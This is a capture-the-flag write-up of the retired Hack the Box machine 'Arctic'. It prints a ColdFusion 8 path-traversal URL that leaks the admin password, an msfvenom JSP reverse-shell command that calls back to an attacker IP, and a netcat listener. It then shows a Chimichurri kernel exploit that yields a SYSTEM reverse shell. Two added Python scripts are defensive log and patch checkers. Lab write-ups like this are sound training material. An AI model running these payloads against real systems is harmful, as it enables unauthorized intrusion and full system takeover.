Hack the Box Arctic

Arcy Caparros
6 min read, Aug 16, 2020

Write-up on HTB’s retired machine “Arctic” that outlines manual exploitation.

Disclaimer

This site contains materials that can be potentially damaging or dangerous. Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose.

Reconnaissance

First, let's use nmapAutomator to automate the recon/enumeration process.

Summary of our nmap scan results:

Running all scans on 10.10.10.11

Host is likely running Windows

---------------------Starting Nmap Quick Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-13 21:28 EDT
Nmap scan report for 10.10.10.11
Host is up (0.019s latency).
Not shown: 997 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
135/tcp open msrpc
8500/tcp open fmtp
49154/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds

Enumeration

We skip the unknown TCP port and the MSRPC port for now. Let's check what we have on tcp/8500.

Adobe ColdFusion 8

Further research on exploits for Adobe ColdFusion 8 led me to the following two candidates that could possibly give us our initial foothold.

https://www.exploit-db.com/exploits/14641
https://repo.theoremforge.com/pentesting/tools/blob/01a0616a6e09c9dbf42d731261309109443cc3e6/Uncategorized/exploit/windows/CVE-2009-2265_coldfusion.8.0.1/upload.py

The first exploit we tried, exploit-db 14641, gave us the admin password of the ColdFusion application.

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en

We were able to log in to the CF admin console after executing the path traversal exploit.

Based on the CVE write-up, we should be able to take advantage of this by uploading files to a CF server via the administrator console and a scheduled task that downloads cfexec.cfm into the server's webroot. That is a bit painful, but we still have the other exploit to test and see whether we could use it instead.

Using ‘upload.py’:

The first step is to create our payload:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.37 LPORT=4444 -f raw > shell.jsp

Run the script:

root@cainta:~/Documents/htb/Artic# ./upload.py 10.10.10.11 8500 shell.jsp
Sending payload...
Successfully uploaded payload!
Find it at http://10.10.10.11:8500/userfiles/file/exploit.jsp

Start a netcat listener and execute the payload.

executing exploit.jsp from the CF8 server
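As an added example (it is not part of the original write-up and not the exploit tooling used above), the following Python script shows how a defender would spot both halves of this foothold in a web-server access log: the locale parameter of enter.cfm carrying "../" sequences and a %00 null byte, and a later request for a server-side script under the /userfiles/ upload directory. The log lines are constructed in a CLF-like format to mirror the requests shown above; the rule names, the list of script extensions and the upload-directory prefix are my assumptions, not settings from ColdFusion or from the post.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed CLF-style access-log lines modelled on the requests in the
# write-up. They are sample data, not log lines captured from the box.
SAMPLE_LOG = """\
10.10.14.37 - - [13/Aug/2020:21:40:01 -0400] "GET /CFIDE/administrator/enter.cfm HTTP/1.1" 200 5120
10.10.14.37 - - [13/Aug/2020:21:41:12 -0400] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 5333
10.10.14.37 - - [13/Aug/2020:21:52:40 -0400] "GET /userfiles/file/exploit.jsp HTTP/1.1" 200 0
10.10.14.37 - - [13/Aug/2020:21:53:05 -0400] "GET /userfiles/file/report.pdf HTTP/1.1" 200 88213
"""

# Pulls method and request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Assumed values: extensions the app server would execute, and the directory
# the upload connector writes into (the path the write-up's upload landed in).
SCRIPT_EXT = (".jsp", ".jspx", ".cfm", ".cfml", ".cfc")
UPLOAD_DIR = "/userfiles/"


def traversal_in_query(target):
    """Return the name of the first query parameter whose decoded value
    carries a directory-traversal sequence or an embedded NUL byte, else None."""
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            # parse_qs already decoded once; decode again so a double-encoded
            # %252e%252e%2f is caught as well.
            decoded = unquote(value)
            if "../" in decoded or "..\\" in decoded or "\x00" in decoded:
                return name
    return None


def script_under_upload_dir(target):
    """True when the request path points at an executable script inside the
    upload directory, i.e. an uploaded file being run rather than served."""
    path = unquote(urlsplit(target).path).lower()
    return path.startswith(UPLOAD_DIR) and path.endswith(SCRIPT_EXT)


def scan_log(text):
    """Return (line number, rule, detail) tuples for every suspicious request."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = m.group("target")
        param = traversal_in_query(target)
        if param is not None:
            alerts.append((lineno, "traversal-or-null-byte", param))
        if script_under_upload_dir(target):
            alerts.append((lineno, "script-in-upload-dir", urlsplit(target).path))
    return alerts


if __name__ == "__main__":
    for lineno, rule, detail in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {rule} ({detail})")
```

The null-byte check matters as much as the "../" check: the %00 in the original request is what makes the server drop the trailing "en" and open password.properties, so a rule that only looks for traversal dots would still fire here, but a rule that only normalises the path would not. Matching the decoded value also means URL-encoded variants of the same request do not slip past the rule.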

Initial Foothold

Privilege Escalation

Execute systeminfo to get additional information about the server. This will assist us in elevating our user privileges.

C:\ColdFusion8\runtime\bin>systeminfo
systeminfo

Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45
System Boot Time: 16/8/2020, 10:14:54
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 378 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.213 MB
Virtual Memory: In Use: 834 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11

C:\ColdFusion8\runtime\bin>

We ran Windows Exploit Suggester against the saved systeminfo output and obtained the following results:

root@cainta:~/Documents/htb/Artic# ./windows-exploit-suggester.py --database 2020-06-07-mssb.xls --systeminfo systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
root@cainta:~/Documents/htb/Artic#

Several rounds of trial and error led us to MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important.
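The suggester's verdict rests on one line of the systeminfo output, "Hotfix(s): N/A": the box has never been patched, so every bulletin for its OS version remains open. As an added example (not from the original post and not the suggester's own code), the following Python script does the defender's version of that check: it parses systeminfo text for the OS version and the installed KB numbers and reports which of the elevation-of-privilege bulletins listed above are still missing. The two systeminfo excerpts are constructed in the format the tool prints (the "patched" one is invented to show the contrast); the bulletin-to-KB mapping is taken from the KB numbers in parentheses in the suggester output.

```python
import re

# Constructed excerpt in systeminfo's output format; the values mirror the
# write-up's box (no hotfixes installed) but this is not the captured output.
SYSTEMINFO_UNPATCHED = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
"""

# Constructed excerpt of the same host after three of the updates were applied.
SYSTEMINFO_PATCHED = """\
Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2393802
                           [03]: KB981852
"""

# Bulletin -> KB article, from the numbers in parentheses in the suggester
# output above. Only the local elevation-of-privilege bulletins are included.
LOCAL_PRIVESC_BULLETINS = {
    "MS10-059": "KB982799",   # Tracing Feature for Services (Chimichurri)
    "MS11-011": "KB2393802",  # Windows Kernel
    "MS10-047": "KB981852",   # Windows Kernel
    "MS10-073": "KB981957",   # Kernel-Mode Drivers
    "MS13-005": "KB2778930",  # Kernel-Mode Driver
}


def parse_systeminfo(text):
    """Return (os_version, set of installed KB identifiers) from systeminfo text."""
    os_version = None
    hotfixes = set()
    for line in text.splitlines():
        if line.startswith("OS Version:"):
            os_version = line.split(":", 1)[1].strip()
        # Hotfix entries look like "[01]: KB982799"; collect every KB token.
        for kb in re.findall(r"\bKB\d{6,7}\b", line, flags=re.IGNORECASE):
            hotfixes.add(kb.upper())
    return os_version, hotfixes


def missing_privesc_patches(text, bulletins=LOCAL_PRIVESC_BULLETINS):
    """Bulletins whose KB is not present in the host's hotfix list, sorted."""
    _, installed = parse_systeminfo(text)
    return sorted(name for name, kb in bulletins.items() if kb not in installed)


if __name__ == "__main__":
    for label, text in (("unpatched", SYSTEMINFO_UNPATCHED),
                        ("patched", SYSTEMINFO_PATCHED)):
        version, _ = parse_systeminfo(text)
        print(f"{label} ({version}): missing {missing_privesc_patches(text)}")
```

One caveat the suggester shares: matching on the original KB number only. A later cumulative or superseding update fixes the same bug without that KB ever appearing in the hotfix list, so treat each reported miss as a lead to confirm against the actual file or kernel version rather than as proof the host is exploitable.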

Found Chimichurri

Chimichurri Kernel exploit

Once you have Chimichurri.exe, host it on your attacking machine so that it can be downloaded onto the CF server.

Start another netcat listener and execute Chimichurri.exe:

c:\Users\tolis\Downloads>Chimichurri.exe 10.10.14.37 9999
Chimichurri.exe 10.10.14.37 9999
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chimichurri/-->Got SYSTEM token...<BR>/Chimichurri/-->Running reverse shell...<BR>/Chimichurri/-->Restoring default registry values...<BR>
c:\Users\tolis\Downloads>
root@cainta:~/Documents/htb/Artic# rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.10.14.37] from (UNKNOWN) [10.10.10.11] 49844
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\Users\tolis\Downloads>c:\Users\tolis\Downloads>whoami
whoami
nt authority\system
Root flag obtained

Lessons learned

We found several possible exploits (entry points) for this server, but what I have illustrated seems the most straightforward way.
